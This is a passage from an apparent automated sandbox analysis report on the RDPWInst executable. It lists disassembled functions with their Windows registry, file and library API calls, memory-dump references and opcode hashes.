                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: String$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 986138563-0
                                                                                                              • Opcode ID: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                                              • Instruction ID: fb71732fc0ca27c4a1f64b9cddcd98791c7700d24e5edf769cc3926ad45b99af
                                                                                                              • Opcode Fuzzy Hash: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                                              • Instruction Fuzzy Hash: D6E08CB91022017DEA002F228D14B3B3368AF82311B6980BFB401BA2D1D67C88419A3C
                                                                                                              Function 004398F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 0043991B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID: ImagePath
                                                                                                              • API String ID: 3660427363-1008103227
                                                                                                              • Opcode ID: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                                              • Instruction ID: d4c3dc3867a5d7f93f9a48779984ca1be9368a485682844844f209d8ad6df9e6
                                                                                                              • Opcode Fuzzy Hash: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                                              • Instruction Fuzzy Hash: C0019E76604208AFDB00EFA9CC81EDFB7A8EB49314F00817AB954D7342DA749E048BA5
                                                                                                              Function 004399A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID: $sD
                                                                                                              • API String ID: 71445658-3047594130
                                                                                                              • Opcode ID: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                                              • Instruction ID: 93af5e93b009f9dfb1ca8860ce5652d254f583336edc44d6a4486ea6cd266cab
                                                                                                              • Opcode Fuzzy Hash: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                                              • Instruction Fuzzy Hash: 19017571B04208AFD714EB65CC52A9EB3FCEB4C304F61457BF445E3281DA79EE149658
                                                                                                              Function 0043987C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,ServiceDll,?,?), ref: 004398AE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value
                                                                                                              • String ID: ServiceDll
                                                                                                              • API String ID: 3702945584-3252591312
                                                                                                              • Opcode ID: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                                              • Instruction ID: 396de0d2a0ab042baed8acc32e75219307ae4a3dd24f7b0442dd3090ee3af4a1
                                                                                                              • Opcode Fuzzy Hash: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                                              • Instruction Fuzzy Hash: 74018671A042086FD750EBAEDC81A9FBBEC9F49324F00806AF958E7382D9799D049765
                                                                                                              Function 00439D1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004399A0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00439D81,?,00447324), ref: 00439D5F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpen
                                                                                                              • String ID: $sD
                                                                                                              • API String ID: 47109696-3047594130
                                                                                                              • Opcode ID: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                                              • Instruction ID: e2b80e318971c5615629c962b670a86c0d36aae3c059df6a015560dc8872c8c4
                                                                                                              • Opcode Fuzzy Hash: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                                              • Instruction Fuzzy Hash: F9013171E14304EFDB05CFA9C892A5DB7F8EB4D310F6140B6E810A7351D675EE10DA54
                                                                                                              Function 0043924C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,004392B4,?,?,ImagePath,00000000,004392B4), ref: 0043927D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID: ImagePath
                                                                                                              • API String ID: 3660427363-1008103227
                                                                                                              • Opcode ID: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                                              • Instruction ID: 752c998736a6c6af0e84b74aa330b189edc71255cbbe141243c37e1b481e64ab
                                                                                                              • Opcode Fuzzy Hash: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                                              • Instruction Fuzzy Hash: 90F01CA23042406FD744EA6E9C81F6B96DCDBCC714F14443EB288C7282D968CC098769
                                                                                                              Function 004389D8 Relevance: 3.1, APIs: 2, Instructions: 98registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A52
                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A8C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 436179556-0
                                                                                                              • Opcode ID: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                                              • Instruction ID: 0ee4ecbf886d923d9c7bbf31fd477b4cbe2ff9aaa7d825c43a2ca86d525438e5
                                                                                                              • Opcode Fuzzy Hash: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                                              • Instruction Fuzzy Hash: E3315C70B04348AFDB11EBA98842B9EF7F9AB48304F50447EB544E7282DA78AF059759
                                                                                                              Function 0040920C Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                                                • Part of subcall function 0040941C: lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                                                • Part of subcall function 0040941C: lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileLibraryLoadModuleNamelstrcpynlstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2912033995-0
                                                                                                              • Opcode ID: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                                              • Instruction ID: f6262d892358e01f8eacd9344567111696420312dcbdab07fa653b046a231d07
                                                                                                              • Opcode Fuzzy Hash: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                                              • Instruction Fuzzy Hash: 43114270A4421CABDB10EB51CD86BDD73B8DB04304F5144FBB509B72D1DA785E858A59
                                                                                                              Function 0040F77C Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F788
                                                                                                              • GetLastError.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F79A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesErrorFileLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 1799206407-0
                                                                                                              • Opcode ID: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                                              • Instruction ID: 8407d2a862a87125c88b0e9e376b57c3f61afd3adb54f06dd13a213247f2bd06
                                                                                                              • Opcode Fuzzy Hash: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                                              • Instruction Fuzzy Hash: 5CE04F1732122016DD3530BC19CA6AB1244498B7A83280937FC51F3BD2D23E4D5B519F
                                                                                                              Function 004046C0 Relevance: 3.0, APIs: 2, Instructions: 29fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004046DF
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004046E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 442123175-0
                                                                                                              • Opcode ID: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                                                                              • Instruction ID: 9545df1e08670e3e4372b9a2ed629c94f39af83de60d034ef920510406bc5815
                                                                                                              • Opcode Fuzzy Hash: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                                                                              • Instruction Fuzzy Hash: D1E092B16041106BDB54CE6A9980A6723CC9B89354F008877BA04EB282E2B9CC015776
                                                                                                              Function 00414634 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InterlockedCompareExchange.KERNEL32(00449DB0,00000001,00000000), ref: 00414644
                                                                                                              • CloseHandle.KERNEL32(00000000,00449DB0,00000001,00000000,?,00449EB4,00414694,00449EB4,00000000,?,0041770A,00000000,00417872), ref: 00414651
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCompareExchangeHandleInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 190309047-0
                                                                                                              • Opcode ID: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                                                                              • Instruction ID: 63ce862fb254c7bb27cf93041dcda8475e179d55c14a8c261316d7a773b2a43f
                                                                                                              • Opcode Fuzzy Hash: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                                                                              • Instruction Fuzzy Hash: 3FD0A7F275172033DA2021A94DC1FAB014C8B9975CF015563BE44EF283D59CCC9102FC
                                                                                                              Function 00438860 Relevance: 3.0, APIs: 2, Instructions: 19registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                                              • RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseFlush
                                                                                                              • String ID:
                                                                                                              • API String ID: 320916635-0
                                                                                                              • Opcode ID: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                                                                              • Instruction ID: 02ceb0405e4d458188627afd9845f8495605ad087acfb065aa2a027a14818eba
                                                                                                              • Opcode Fuzzy Hash: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                                                                              • Instruction Fuzzy Hash: 8DE0ECA1B003008ADF64FF7684C4A12B6D86F48304B48D4BAB808DE14BDA3CD4109725
                                                                                                              Function 00438B08 Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                                                                              • Instruction ID: 89278caf5ef83198d89b8dc4a9c9fb76eb3a10e2e46a05883e0df08903897f1a
                                                                                                              • Opcode Fuzzy Hash: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                                                                              • Instruction Fuzzy Hash: C921D370B04344AFDB11EB65C842B9EF7F99B48304F2144BEB804E3282DA7C9E059758
                                                                                                              Function 004083B0 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 004083CE
                                                                                                                • Part of subcall function 0040920C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                                                • Part of subcall function 0040920C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileModuleName$LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 4113206344-0
                                                                                                              • Opcode ID: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                                                                              • Instruction ID: 90d1829834ce79f86c13b7573f8e9a8c333b05ddd33e28dd31ebb7d28ab9999b
                                                                                                              • Opcode Fuzzy Hash: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                                                                              • Instruction Fuzzy Hash: 84E0C9B1A003109BCB10DE58C9C5A477798AB48764F044AAAED64EF387D775DD1087D5
                                                                                                              Function 0040F650 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000,?,?,004257A8,0042F5F0,00000000,0042F6D7,?,?,004257A8), ref: 0040F68A
                                                                                                              Memory Dump Source
